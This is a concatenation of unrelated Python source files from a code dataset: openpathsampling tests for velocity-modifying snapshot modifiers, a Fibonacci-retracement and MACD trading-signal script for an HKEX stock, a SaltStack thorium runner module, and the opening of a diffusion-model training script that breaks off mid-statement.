0.0]]),\n engine=paths.engines.toy.Engine({}, topology_2x3D)\n )\n self.snap_3x1D = paths.engines.toy.Snapshot(\n coordinates=np.array([[0.0], [0.0], [0.0]]),\n velocities=np.array([[0.0], [0.0], [0.0]]),\n engine=paths.engines.toy.Engine({}, topology_3x1D)\n )\n self.snap_1x2D = paths.engines.toy.Snapshot(\n coordinates=np.array([[0.0, 0.0]]),\n velocities=np.array([[0.0, 0.0]]),\n engine=paths.engines.toy.Engine({}, topology_1x2D)\n )\n\n def test_call(self):\n # NOTE: these tests basically check the API. 
Tests for correctness\n # are in `test_snapshot_modifier.ipynb`, because they are inherently\n # stochastic.\n randomizer = RandomVelocities(beta=old_div(1.0, 5.0))\n new_1x2D = randomizer(self.snap_1x2D)\n assert new_1x2D.coordinates.shape == new_1x2D.velocities.shape\n assert (pytest.approx(new_1x2D.coordinates) ==\n self.snap_1x2D.coordinates)\n assert new_1x2D is not self.snap_1x2D\n assert new_1x2D.coordinates is not self.snap_1x2D.coordinates\n assert new_1x2D.velocities is not self.snap_1x2D.velocities\n for val in new_1x2D.velocities.flatten():\n assert val != 0.0\n assert randomizer.probability_ratio(self.snap_1x2D, new_1x2D) == 1.0\n\n new_2x3D = randomizer(self.snap_2x3D)\n assert new_2x3D.coordinates.shape == new_2x3D.velocities.shape\n assert_array_almost_equal(new_2x3D.coordinates,\n self.snap_2x3D.coordinates)\n assert new_2x3D is not self.snap_2x3D\n assert new_2x3D.coordinates is not self.snap_2x3D.coordinates\n assert new_2x3D.velocities is not self.snap_2x3D.velocities\n for val in new_2x3D.velocities.flatten():\n assert val != 0.0\n\n new_3x1D = randomizer(self.snap_3x1D)\n assert new_3x1D.coordinates.shape == new_3x1D.velocities.shape\n assert_array_almost_equal(new_3x1D.coordinates,\n self.snap_3x1D.coordinates)\n assert new_3x1D is not self.snap_3x1D\n assert new_3x1D.coordinates is not self.snap_3x1D.coordinates\n assert new_3x1D.velocities is not self.snap_3x1D.velocities\n for val in new_3x1D.velocities.flatten():\n assert val != 0.0\n\n def test_subset_call(self):\n randomizer = RandomVelocities(beta=old_div(1.0, 5.0), subset_mask=[0])\n new_2x3D = randomizer(self.snap_2x3D)\n assert new_2x3D.coordinates.shape == new_2x3D.velocities.shape\n assert_array_almost_equal(new_2x3D.coordinates,\n self.snap_2x3D.coordinates)\n assert new_2x3D is not self.snap_2x3D\n assert new_2x3D.coordinates is not self.snap_2x3D.coordinates\n assert new_2x3D.velocities is not self.snap_2x3D.velocities\n # show that the unchanged atom is, in fact, unchanged\n assert_array_almost_equal(new_2x3D.velocities[1],\n self.snap_2x3D.velocities[1])\n for val in new_2x3D.velocities[0]:\n assert val != 0.0\n\n def test_no_beta_bad_engine(self):\n engine = self.snap_2x3D.engine\n randomizer = RandomVelocities(engine=engine)\n with pytest.raises(RuntimeError):\n randomizer(self.snap_2x3D)\n\n def test_with_openmm_snapshot(self):\n # note: this is only a smoke test; correctness depends on OpenMM's\n # tests of its constraint approaches.\n if not omt:\n pytest.skip(\"Requires OpenMMTools (not installed)\")\n test_system = omt.testsystems.AlanineDipeptideVacuum()\n template = omm_engine.snapshot_from_testsystem(test_system)\n engine = omm_engine.Engine(\n topology=template.topology,\n system=test_system.system,\n integrator=omt.integrators.VVVRIntegrator()\n )\n beta = old_div(1.0, (300.0 * u.kelvin * u.BOLTZMANN_CONSTANT_kB))\n\n # when the engine doesn't have an existing snapshot\n randomizer = RandomVelocities(beta=beta, engine=engine)\n new_snap = randomizer(template)\n # coordinates stayed the same\n assert_array_almost_equal(template.coordinates,\n new_snap.coordinates)\n # velocities changed\n assert not np.isclose(template.velocities, new_snap.velocities).all()\n engine.generate(new_snap, [lambda x, foo: len(x) <= 4])\n\n # when the engine does have an existing snapshot\n zeros = np.zeros((engine.n_atoms, engine.n_spatial))\n zero_snap = paths.engines.openmm.Snapshot.construct(\n coordinates=zeros * u.nanometer,\n velocities=zeros * u.nanometer / u.picosecond,\n 
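# keep the template's periodic box even though coordinates and velocities are zeroed\n            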
box_vectors=template.box_vectors,\n            engine=engine\n        )\n        engine.current_snapshot = zero_snap\n        randomizer = RandomVelocities(beta=beta, engine=engine)\n        new_snap = randomizer(template)\n        # coordinates stayed the same\n        assert_array_almost_equal(template.coordinates,\n                                  new_snap.coordinates)\n        # velocities changed\n        assert not np.isclose(template.velocities, new_snap.velocities).all()\n\n        # internal snapshot unchanged\n        assert engine.current_snapshot == zero_snap\n        engine.generate(new_snap, [lambda x, foo: len(x) <= 4])\n\n    def test_probability_ratio(self):\n        # Should be sampled correctly, so this has to be 1.0\n        randomizer = RandomVelocities(beta=20)\n        assert randomizer.probability_ratio(None, None) == 1.0\n\n\nclass TestGeneralizedDirectionModifier(object):\n    def setup_method(self):\n        import openpathsampling.engines.toy as toys\n        # applies one delta_v to all atoms\n        self.toy_modifier_all = GeneralizedDirectionModifier(1.5)\n        # defines delta_v per atom, including those not in the mask\n        self.toy_modifier_long_dv = GeneralizedDirectionModifier(\n            delta_v=[0.5, 1.0, 2.0],\n            subset_mask=[1, 2]\n        )\n        # defines delta_v per atom in the subset mask\n        self.toy_modifier = GeneralizedDirectionModifier(\n            delta_v=[1.0, 2.0],\n            subset_mask=[1, 2]\n        )\n        self.toy_engine = toys.Engine(\n            topology=toys.Topology(n_spatial=2, n_atoms=3, pes=None,\n                                   masses=[1.0, 1.5, 4.0]),\n            options={}\n        )\n        self.toy_snapshot = toys.Snapshot(\n            coordinates=np.array([[0.0, 0.0], [0.0, 0.0], [0.0, 0.0]]),\n            velocities=np.array([[1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]),\n            engine=self.toy_engine\n        )\n\n        # create the OpenMM versions\n        if not omt:\n            pytest.skip(\"Requires OpenMMTools (not installed)\")\n        if not u:\n            pytest.skip(\"Requires openmm.unit (not installed)\")\n        u_vel = old_div(u.nanometer, u.picosecond)\n        self.openmm_modifier = GeneralizedDirectionModifier(1.2 * u_vel)\n        ad_vacuum = omt.testsystems.AlanineDipeptideVacuum(constraints=None)\n        self.test_snap = omm_engine.snapshot_from_testsystem(ad_vacuum)\n        self.openmm_engine = omm_engine.Engine(\n            topology=self.test_snap.topology,\n            system=ad_vacuum.system,\n            
integrator=omt.integrators.VVVRIntegrator()\n )\n modifier = GeneralizedDirectionModifier(\n 1.2 * u.nanometer / u.picosecond,\n engine=constrained_engine\n )\n # this is a hack because ndofs not defined in TestsystemEngine\n self.openmm_engine.current_snapshot = self.test_snap\n snap = self.openmm_engine.current_snapshot\n # when it checks based on the engine, it should be fine\n self.openmm_modifier._verify_snapshot(snap)\n # when modifier overrides snap.engine, it errors\n with pytest.raises(RuntimeError, match=\"constraints\"):\n modifier._verify_snapshot(snap)\n\n def test_verify_snapshot_box_vectors(self):\n ad_explicit = omt.testsystems.AlanineDipeptideExplicit(\n constraints=None,\n rigid_water=False\n )\n ad_explicit_tmpl = omm_engine.snapshot_from_testsystem(ad_explicit)\n explicit_engine = omm_engine.Engine(\n topology=ad_explicit_tmpl.topology,\n system=ad_explicit.system,\n integrator=omt.integrators.VVVRIntegrator()\n )\n ad_explicit_snap = ad_explicit_tmpl.copy_with_replacement(\n engine=explicit_engine\n )\n self.openmm_modifier._verify_snapshot(ad_explicit_snap)\n\n def test_dv_widths_toy(self):\n selected = np.array([1.0, 2.0])\n n_atoms = len(self.toy_snapshot.coordinates)\n assert_array_almost_equal(self.toy_modifier._dv_widths(n_atoms, 2),\n selected)\n assert_array_almost_equal(\n self.toy_modifier_long_dv._dv_widths(n_atoms, 2),\n selected\n )\n assert_array_almost_equal(\n self.toy_modifier_all._dv_widths(n_atoms, n_atoms),\n np.array([1.5]*3)\n )\n\n def test_dv_widths_openmm(self):\n n_atoms = len(self.openmm_snap.coordinates)\n results = self.openmm_modifier._dv_widths(n_atoms, n_atoms)\n expected = np.array([1.2] * n_atoms) * u.nanometer / u.picosecond\n for truth, beauty in zip(expected, results):\n assert pytest.approx(truth._value) == beauty._value\n\n def test_rescale_linear_momenta_constant_energy_toy(self):\n velocities = np.array([[1.5, -1.0], [-1.0, 2.0], [0.25, -1.0]])\n masses = np.array([1.0, 1.5, 4.0])\n new_vel = self.toy_modifier._remove_linear_momentum(\n velocities=velocities,\n masses=masses\n )\n new_momenta = new_vel * masses[:, np.newaxis]\n total_momenta = sum(new_momenta)\n assert_array_almost_equal(total_momenta, np.array([0.0]*2))\n new_vel = self.toy_modifier._rescale_kinetic_energy(\n velocities=velocities,\n masses=masses,\n double_KE=20.0\n )\n new_momenta = new_vel * masses[:, np.newaxis]\n total_momenta = sum(new_momenta)\n new_ke = sum(sum(new_momenta * new_vel))\n # tests require that the linear momentum be 0, and KE be correct\n assert_array_almost_equal(total_momenta, np.array([0.0]*2))\n assert pytest.approx(new_ke) == 20.0\n\n def test_remove_momentum_rescale_energy_openmm(self):\n # don't actually need to do everything with OpenMM, but do need to\n # add units\n u_vel = old_div(u.nanometer, u.picosecond)\n u_mass = old_div(u.dalton, u.AVOGADRO_CONSTANT_NA)\n u_energy = old_div(u.kilojoule_per_mole, u.AVOGADRO_CONSTANT_NA)\n\n velocities = np.array([[1.5, -1.0],\n [-1.0, 2.0],\n [0.25, -1.0]]\n ) * u_vel\n masses = np.array([1.0, 1.5, 4.0]) * u_mass\n new_vel = self.openmm_modifier._remove_linear_momentum(\n velocities=velocities,\n masses=masses\n )\n new_momenta = new_vel * masses[:, np.newaxis]\n total_momenta = sum(new_momenta, new_momenta[0])\n assert_array_almost_equal(total_momenta,\n np.array([0.0]*2) * u_vel * u_mass)\n\n new_vel = self.openmm_modifier._rescale_kinetic_energy(\n velocities=velocities,\n masses=masses,\n double_KE=20.0 * u_energy\n )\n new_momenta = new_vel * masses[:, np.newaxis]\n total_momenta = 
sum(new_momenta, new_momenta[0])\n zero_energy = 0.0 * u_energy\n new_ke = sum(sum(new_momenta * new_vel, zero_energy), zero_energy)\n # tests require that the linear momentum be 0, and KE be correct\n assert_array_almost_equal(total_momenta,\n np.array([0.0]*2) * u_vel * u_mass)\n assert new_ke.unit == (20.0 * u_energy).unit\n assert pytest.approx(new_ke._value) == (20.0 * u_energy)._value\n\n def test_probability_ratio(self):\n # Should always be 1 as KE is conserved\n assert self.toy_modifier_all.probability_ratio(None, None) == 1.0\n\n\nclass TestVelocityDirectionModifier(object):\n def setup_method(self):\n import openpathsampling.engines.toy as toys\n self.toy_modifier = VelocityDirectionModifier(\n delta_v=[1.0, 2.0],\n subset_mask=[1, 2],\n remove_linear_momentum=False\n )\n self.toy_engine = toys.Engine(\n topology=toys.Topology(n_spatial=2, n_atoms=3, pes=None,\n masses=np.array([1.0, 1.5, 4.0])),\n options={}\n )\n self.toy_snapshot = toys.Snapshot(\n coordinates=np.array([[0.0, 0.0], [0.0, 0.0], [0.0, 0.0]]),\n velocities=np.array([[1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]),\n engine=self.toy_engine\n )\n\n if paths.integration_tools.HAS_SIMTK_UNIT:\n u_vel = old_div(u.nanometer, u.picosecond)\n self.openmm_modifier = VelocityDirectionModifier(\n delta_v=1.2*u_vel,\n remove_linear_momentum=False\n )\n if omt: # TODO: separate out tests\n ad_vacuum = omt.testsystems.AlanineDipeptideVacuum(\n constraints=None)\n self.test_snap = omm_engine.snapshot_from_testsystem(ad_vacuum)\n self.openmm_engine = omm_engine.Engine(\n topology=self.test_snap.topology,\n system=ad_vacuum.system,\n integrator=omt.integrators.VVVRIntegrator()\n )\n\n self.openmm_snap = self.test_snap.copy_with_replacement(\n engine=self.openmm_engine,\n velocities=np.ones(\n shape=self.test_snap.velocities.shape) * u_vel\n )\n\n def test_select_atoms_to_modify(self):\n assert self.toy_modifier._select_atoms_to_modify(2) == [0, 1]\n if omt: # TODO: separate out tests\n n_atoms = len(self.openmm_snap.coordinates)\n assert (self.openmm_modifier._select_atoms_to_modify(n_atoms) ==\n list(range(n_atoms)))\n\n def test_call(self):\n new_toy_snap = self.toy_modifier(self.toy_snapshot)\n assert_array_almost_equal(new_toy_snap.coordinates,\n self.toy_snapshot.coordinates)\n new_vel = new_toy_snap.velocities\n old_vel = self.toy_snapshot.velocities\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n assert Counter(same_vel) == Counter({True: 1, False: 2})\n for new_v, old_v in zip(new_vel, old_vel):\n assert (pytest.approx(sum([v**2 for v in new_v])) ==\n sum([v**2 for v in old_v]))\n\n if omt: # TODO: separate out tests\n new_omm_snap = self.openmm_modifier(self.openmm_snap)\n n_atoms = len(self.openmm_snap.coordinates)\n assert_array_almost_equal(new_omm_snap.coordinates,\n self.openmm_snap.coordinates)\n new_vel = new_omm_snap.velocities\n old_vel = self.openmm_snap.velocities\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n assert Counter(same_vel) == Counter({False: n_atoms})\n u_vel_sq = (old_div(u.nanometers, u.picoseconds))**2\n for new_v, old_v in zip(new_vel, old_vel):\n assert (pytest.approx(sum([(v**2).value_in_unit(u_vel_sq)\n for v in new_v])\n ) ==\n sum([(v**2).value_in_unit(u_vel_sq) for v in old_v])\n )\n\n def test_call_with_linear_momentum_fix(self):\n toy_modifier = VelocityDirectionModifier(\n delta_v=[1.0, 2.0],\n subset_mask=[1, 2],\n 
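# re-zero the total linear momentum after the velocity perturbation\n            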
remove_linear_momentum=True\n )\n new_toy_snap = toy_modifier(self.toy_snapshot)\n velocities = new_toy_snap.velocities\n momenta = velocities * new_toy_snap.masses[:, np.newaxis]\n assert_array_almost_equal(sum(momenta), np.array([0.0]*2))\n double_ke = sum(sum(momenta * velocities))\n assert pytest.approx(double_ke) == 86.0\n\n if omt: # TODO: separate out tests\n u_vel = old_div(u.nanometer, u.picosecond)\n u_mass = old_div(u.dalton, u.AVOGADRO_CONSTANT_NA)\n\n openmm_modifier = VelocityDirectionModifier(\n delta_v=1.2*u_vel,\n remove_linear_momentum=False\n )\n new_openmm_snap = openmm_modifier(self.openmm_snap)\n velocities = new_openmm_snap.velocities\n momenta = velocities * new_openmm_snap.masses[:, np.newaxis]\n zero_momentum = 0 * u_vel * u_mass\n total_momenta = sum(momenta, zero_momentum)\n assert_array_almost_equal(total_momenta,\n np.array([0.0]*3) * u_vel * u_mass)\n\n\nclass TestSingleAtomVelocityDirectionModifier(object):\n def setup_method(self):\n import openpathsampling.engines.toy as toys\n self.toy_modifier = SingleAtomVelocityDirectionModifier(\n delta_v=[1.0, 2.0],\n subset_mask=[1, 2],\n remove_linear_momentum=False\n )\n self.toy_engine = toys.Engine(\n topology=toys.Topology(n_spatial=2, n_atoms=3, pes=None,\n masses=np.array([1.0, 1.5, 4.0])),\n options={}\n )\n self.toy_snapshot = toys.Snapshot(\n coordinates=np.array([[0.0, 0.0], [0.0, 0.0], [0.0, 0.0]]),\n velocities=np.array([[1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]),\n engine=self.toy_engine\n )\n\n if omt: # TODO: separate out tests/\n u_vel = old_div(u.nanometer, u.picosecond)\n self.openmm_modifier = SingleAtomVelocityDirectionModifier(\n delta_v=1.2*u_vel,\n remove_linear_momentum=False\n )\n ad_vacuum = omt.testsystems.AlanineDipeptideVacuum(\n constraints=None)\n self.test_snap = omm_engine.snapshot_from_testsystem(ad_vacuum)\n self.openmm_engine = omm_engine.Engine(\n topology=self.test_snap.topology,\n system=ad_vacuum.system,\n integrator=omt.integrators.VVVRIntegrator()\n )\n\n self.openmm_snap = self.test_snap.copy_with_replacement(\n engine=self.openmm_engine,\n velocities=np.ones(\n shape=self.test_snap.velocities.shape) * u_vel\n )\n\n def test_select_atoms_to_modify(self):\n selected = self.toy_modifier._select_atoms_to_modify(2)\n assert len(selected) == 1\n selected = [self.toy_modifier._select_atoms_to_modify(2)[0]\n for i in range(20)]\n count = Counter(selected)\n assert set([0, 1]) == set(count.keys())\n assert count[0] > 0\n assert count[1] > 0\n\n def test_call(self):\n new_toy_snap = self.toy_modifier(self.toy_snapshot)\n assert_array_almost_equal(new_toy_snap.coordinates,\n self.toy_snapshot.coordinates)\n new_vel = new_toy_snap.velocities\n old_vel = self.toy_snapshot.velocities\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n assert Counter(same_vel) == Counter({True: 2, False: 1})\n for new_v, old_v in zip(new_vel, old_vel):\n assert (pytest.approx(sum([v**2 for v in new_v])) ==\n sum([v**2 for v in old_v]))\n\n if omt: # TODO: separate out tests\n new_omm_snap = self.openmm_modifier(self.openmm_snap)\n n_atoms = len(self.openmm_snap.coordinates)\n assert_array_almost_equal(new_omm_snap.coordinates,\n self.openmm_snap.coordinates)\n new_vel = new_omm_snap.velocities\n old_vel = self.openmm_snap.velocities\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n same_vel = [np.allclose(new_vel[i], old_vel[i])\n for i in range(len(new_vel))]\n assert Counter(same_vel) == Counter({True: n_atoms-1, False: 1})\n u_vel_sq = 
(old_div(u.nanometers, u.picoseconds))**2\n            for new_v, old_v in zip(new_vel, old_vel):\n                assert (pytest.approx(\n                    sum([(v**2).value_in_unit(u_vel_sq) for v in new_v])) ==\n                    sum([(v**2).value_in_unit(u_vel_sq) for v in old_v]))\n\n    def test_call_with_linear_momentum_fix(self):\n        toy_modifier = SingleAtomVelocityDirectionModifier(\n            delta_v=[1.0, 2.0],\n            subset_mask=[1, 2],\n            remove_linear_momentum=True\n        )\n        new_toy_snap = toy_modifier(self.toy_snapshot)\n        velocities = new_toy_snap.velocities\n        momenta = velocities * new_toy_snap.masses[:, np.newaxis]\n        assert_array_almost_equal(sum(momenta), np.array([0.0]*2))\n        double_ke = sum(sum(momenta * velocities))\n        assert pytest.approx(double_ke) == 86.0\n\n        if omt:  # TODO: separate out tests\n            u_vel = old_div(u.nanometer, u.picosecond)\n            u_mass = old_div(u.dalton, u.AVOGADRO_CONSTANT_NA)\n\n            openmm_modifier = SingleAtomVelocityDirectionModifier(\n                delta_v=1.2*u_vel,\n                remove_linear_momentum=False\n            )\n            new_openmm_snap = openmm_modifier(self.openmm_snap)\n            velocities = new_openmm_snap.velocities\n            momenta = velocities * new_openmm_snap.masses[:, np.newaxis]\n            zero_momentum = 0 * u_vel * u_mass\n            total_momenta = sum(momenta, zero_momentum)\n            assert_array_almost_equal(total_momenta,\n                                      np.array([0.0]*3) * u_vel * u_mass)\n\n\nclass TestSnapshotModifierDeprecations(object):\n    # TODO OPS 2.0: Depr should be completed and this test altered to check for\n    # the error\n    def test_raise_deprecation_prob_ratio(self):\n        class DummyMod(SnapshotModifier):\n            # TODO PY 2.7, don't override __call__ for PY 3.x\n            def __call__(self, a):\n                pass\n        dummy_mod = DummyMod()\n        with pytest.warns(DeprecationWarning) as warn:\n            a = dummy_mod.probability_ratio(None, None)\n        assert len(warn) == 1\n        assert \"NotImplementedError\" in str(warn[0])\n        assert a == 1.0\n\n    def test_raise_depr_nomodifier_subset(self):\n        # The warning might be emitted earlier, on line 75\n        # (NoModification(subset_mask))\n        # Therefore this will not always trigger\n        pass\n        # with pytest.warns(DeprecationWarning) as warn:\n        #     _ = NoModification(subset_mask=\"foo\")\n        # assert len(warn) == 1\n        # assert \"subset_mask\" in str(warn[0])\n","repo_name":"openpathsampling/openpathsampling","sub_path":"openpathsampling/tests/test_snapshot_modifier.py","file_name":"test_snapshot_modifier.py","file_ext":"py","file_size_in_byte":31385,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"78"} {"seq_id":"22586342191","text":"# import libraries\n# from polygon_config import POLYGON_API_TOKEN\nimport json\nfrom pandas.core.indexes.base import Index\nimport quandl\nimport pandas as pd\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom quandl_config import API_KEY\nplt.style.use('fivethirtyeight')\n\n# from polygon_config import POLYGON_API_TOKEN\n\n# The following code uses polygon.io as data source\n# Data = f\"https://api.polygon.io/v1/open-close/AAPL/2020-10-14?adjusted=true&apiKey={POLYGON_API_TOKEN}\"\n\n# data = requests.get(Data)\n\n# print(data.json())\n# , start_date=\"2020-1-1\", end_date=\"2021-1-31\"\n\n\n# The following code uses quandl as data source\ndata = quandl.get(\n    \"HKEX/09988\", authtoken=API_KEY, start_date=\"2019-1-1\", end_date=\"2021-3-31\")\n\n\n# set datetime as index\ndf = pd.DataFrame(data)\n\n\ncore_five = df[[\"High\", \"Low\", \"Nominal Price\",\n                \"Previous Close\", \"Share Volume (000)\"]]\n\nncf = core_five.rename(columns={\"Nominal Price\": \"Close\",\n                               \"Share Volume (000)\": \"Volume (000)\"})\n\n
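\n# Each retracement level sits a fixed Fibonacci fraction of the high-low range\n# below the high: level = max_price - (max_price - min_price) * r, with\n# r in {0.236, 0.382, 0.5, 0.618}.\n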
\n# Calculate the Fibonacci retracement levels\n\nmax_price = ncf['Close'].max()\nmin_price = ncf['Close'].min()\n\ndifference = max_price - min_price\nfirst_level = max_price - difference * 0.236\nsecond_level = max_price - difference * 0.382\nthird_level = max_price - difference * 0.5\nfourth_level = max_price - difference * 0.618\n\n# Calculate the MACD line and the Signal Line indicator\n# Calculate the Short Term Exponential Moving Average\n\nShortEMA = ncf.Close.ewm(span=12, adjust=False).mean()\n# Calculate the Long Term Exponential Moving Average\n\nLongEMA = ncf.Close.ewm(span=26, adjust=False).mean()\n\n# Calculate the Moving Average Convergence/Divergence (MACD)\nMACD = ShortEMA - LongEMA\n\n# Calculate the Signal Line\nsignal = MACD.ewm(span=9, adjust=False).mean()\n\n# Plot the Fibonacci levels along with the close price and the MACD and signal line\nnew_df = ncf\n\n\n# plot the Fibonacci Levels\n# plt.figure(figsize=(12.33, 9.5))\n# plt.subplot(2, 1, 1)\n# plt.plot(new_df.index, new_df['Close'])\n# plt.axhline(max_price, linestyle='--', alpha=0.5, color='red')\n# plt.axhline(first_level, linestyle='--', alpha=0.5, color='orange')\n# plt.axhline(second_level, linestyle='--', alpha=0.5, color='yellow')\n# plt.axhline(third_level, linestyle='--', alpha=0.5, color='green')\n# plt.axhline(fourth_level, linestyle='--', alpha=0.5, color='blue')\n# plt.axhline(min_price, linestyle='--', alpha=0.5, color='purple')\n# plt.ylabel('Fibonacci')\n\n# Plot the MACD Line and the Signal Line\n\n# plt.subplot(2, 1, 2)\n# plt.plot(new_df.index, MACD)\n# plt.plot(new_df.index, signal)\n# plt.ylabel('MACD')\n# plt.xticks(rotation=45)\n# plt.show()\n\n# Create new columns for the data frame\nncf['MACD'] = MACD\nncf['Signal Line'] = signal\n\n\n# Create a function to be used in our strategy to get the upper Fibonacci level and the lower Fibonacci level of the current price\n\ndef getlevels(price):\n    if price >= first_level:\n        return (max_price, first_level)\n    elif price >= second_level:\n        return(first_level, second_level)\n    elif price >= third_level:\n        return(second_level, third_level)\n    elif price >= fourth_level:\n        return(third_level, fourth_level)\n    else:\n        return(fourth_level, min_price)\n\n# Create a function for the trading strategy\n\n# The strategy\n\n# If the signal line crosses above the MACD line and the current price crossed above or below the last Fibonacci level, then buy\n\n# If the signal line crosses below the MACD line and the current price crossed above or below the last Fibonacci level, then sell\n\n# Never sell at a price lower than the price I bought at\n\n\ndef strategy(df):\n    buy_list = []\n    sell_list = []\n    flag = 0\n    last_buy_price = 0\n\n    # Loop through the data set\n    for i in range(0, df.shape[0]):\n        price = ncf['Close'][i]\n        # If this is the first data point within the data set, then get the level above and below it\n        if i == 0:\n            upper_lvl, lower_lvl = getlevels(price)\n            buy_list.append(np.nan)\n            sell_list.append(np.nan)\n        # Else if the current price is greater than or equal to the upper level or less than or equal to the lower level, then we know the price has 'hit' or crossed a Fibonacci level\n        elif price >= upper_lvl or price <= lower_lvl:\n\n            # Check to see if the MACD line crossed above or below the signal line\n            if ncf['Signal Line'][i] > ncf['MACD'][i] and flag == 0:\n                last_buy_price = price\n                buy_list.append(price)\n                sell_list.append(np.nan)\n                # set the flag to 1 to signal that the share was bought\n                flag = 1\n\n            elif ncf['Signal Line'][i] < ncf['MACD'][i] and flag == 1 and price > 
last_buy_price:\n                buy_list.append(np.nan)\n                sell_list.append(price)\n                # Set the flag to 0 to signal that the share was sold\n                flag = 0\n            else:\n                buy_list.append(np.nan)\n                sell_list.append(np.nan)\n        else:\n            buy_list.append(np.nan)\n            sell_list.append(np.nan)\n\n        # Update the new levels\n        upper_lvl, lower_lvl = getlevels(price)\n\n    return buy_list, sell_list\n\n\n# Create buy and sell columns\nbuy, sell = strategy(df)\nncf['Buy_Signal_Price'] = buy\nncf['Sell_Signal_Price'] = sell\n# Show data\n# print(ncf)\n\n# Plot the Fibonacci levels along with the buy and sell signals\n\nnew_df = ncf\n\nplt.figure(figsize=(12.33, 4.5))\nplt.plot(new_df.index, new_df['Close'], alpha=0.5)\nplt.scatter(new_df.index, new_df['Buy_Signal_Price'],\n            color='green', marker='^', alpha=1)\nplt.scatter(new_df.index, new_df['Sell_Signal_Price'],\n            color='red', marker='v', alpha=1)\nplt.axhline(max_price, linestyle='--', alpha=0.5, color='red')\nplt.axhline(first_level, linestyle='--', alpha=0.5, color='orange')\nplt.axhline(second_level, linestyle='--', alpha=0.5, color='yellow')\nplt.axhline(third_level, linestyle='--', alpha=0.5, color='green')\nplt.axhline(fourth_level, linestyle='--', alpha=0.5, color='blue')\nplt.axhline(min_price, linestyle='--', alpha=0.5, color='purple')\nplt.ylabel('Close Price in HKD')\nplt.xlabel('Date')\nplt.xticks(rotation=45)\nplt.show()\n#ncf.to_csv('09988.csv', index=False)\n# print(new_core_five)\n","repo_name":"ProjectVH/fibonnacci_strat","sub_path":"fibonnacci.py","file_name":"fibonnacci.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} {"seq_id":"12849698954","text":"\"\"\"\nReact by calling asynchronous runners\n\"\"\"\n\nimport salt.runner\n\n\ndef cmd(name, func=None, arg=(), **kwargs):\n    \"\"\"\n    Execute a runner asynchronously:\n\n    USAGE:\n\n    .. 
code-block:: yaml\n\n        run_cloud:\n          runner.cmd:\n            - func: cloud.create\n            - arg:\n                - my-ec2-config\n                - myinstance\n\n        run_cloud:\n          runner.cmd:\n            - func: cloud.create\n            - kwargs:\n                provider: my-ec2-config\n                instances: myinstance\n    \"\"\"\n    ret = {\"name\": name, \"changes\": {}, \"comment\": \"\", \"result\": True}\n    if func is None:\n        func = name\n    local_opts = {}\n    local_opts.update(__opts__)\n    local_opts[\"async\"] = True  # ensure this will be run asynchronously\n    local_opts.update({\"fun\": func, \"arg\": arg, \"kwarg\": kwargs})\n    runner = salt.runner.Runner(local_opts)\n    runner.run()\n    return ret\n","repo_name":"saltstack/salt","sub_path":"salt/thorium/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} {"seq_id":"20013792970","text":"import diffuser.utils as utils\nimport pdb\nfrom cost import action_cost, qvel_cost, vel_cost, healthy_cost\n\n#-----------------------------------------------------------------------------#\n#----------------------------------- setup -----------------------------------#\n#-----------------------------------------------------------------------------#\n\nclass Parser(utils.Parser):\n    dataset: str = 'walker2d-medium-replay-v2'\n    config: str = 'config.locomotion'\n\nargs = Parser().parse_args('cost_values')\n\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '3'\n\n#binarization_threshold\n# action = 1.5, vel = 2.5\n\ndef cost_func(*a, **kwargs):\n    #kwargs['is_single_step'] = True\n    #kwargs['binarization_threshold'] = 2.5\n    kwargs['env_name'] = args.dataset.split(\"-\")[0]\n    return vel_cost(*a, **kwargs)\n\n#-----------------------------------------------------------------------------#\n#---------------------------------- dataset ----------------------------------#\n#-----------------------------------------------------------------------------#\n\ndataset_config = utils.Config(\n    args.loader,\n    savepath=(args.savepath, 'dataset_config.pkl'),\n    env=args.dataset,\n    horizon=args.horizon,\n    normalizer=args.normalizer,\n    preprocess_fns=args.preprocess_fns,\n    use_padding=args.use_padding,\n    max_path_length=args.max_path_length,\n    ## value-specific kwargs\n    discount=args.discount,\n    termination_penalty=args.termination_penalty,\n    normed=args.normed,\n    cost_func=cost_func\n)\n\nrender_config = utils.Config(\n    args.renderer,\n    savepath=(args.savepath, 'render_config.pkl'),\n    env=args.dataset,\n)\n\ndataset = dataset_config()\nrenderer = render_config()\n\nobservation_dim = dataset.observation_dim\naction_dim = dataset.action_dim\n\n#-----------------------------------------------------------------------------#\n#------------------------------ model & trainer ------------------------------#\n#-----------------------------------------------------------------------------#\n\nif \"decouple\" in args.config:\n    dynamic_model_config = utils.Config(\n        args.model,\n        savepath=(args.savepath, 'dynamic_model_config.pkl'),\n        horizon=args.horizon,\n        transition_dim=observation_dim+action_dim,\n        output_dim=observation_dim,\n        cond_dim=observation_dim,\n        dim_mults=args.dim_mults,\n        attention=args.attention,\n        device=args.device,\n    )\n\n    policy_model_config = utils.Config(\n        args.model,\n        savepath=(args.savepath, 'policy_model_config.pkl'),\n        horizon=args.horizon,\n        transition_dim=observation_dim+action_dim,\n        output_dim=action_dim,\n        cond_dim=observation_dim,\n        dim_mults=args.dim_mults,\n        attention=args.attention,\n        device=args.device,\n    )\nelse:\n
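    # Joint (non-decoupled) variant: a single diffusion model predicts the\n    # concatenated observation-action transition directly.\n    model_config 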
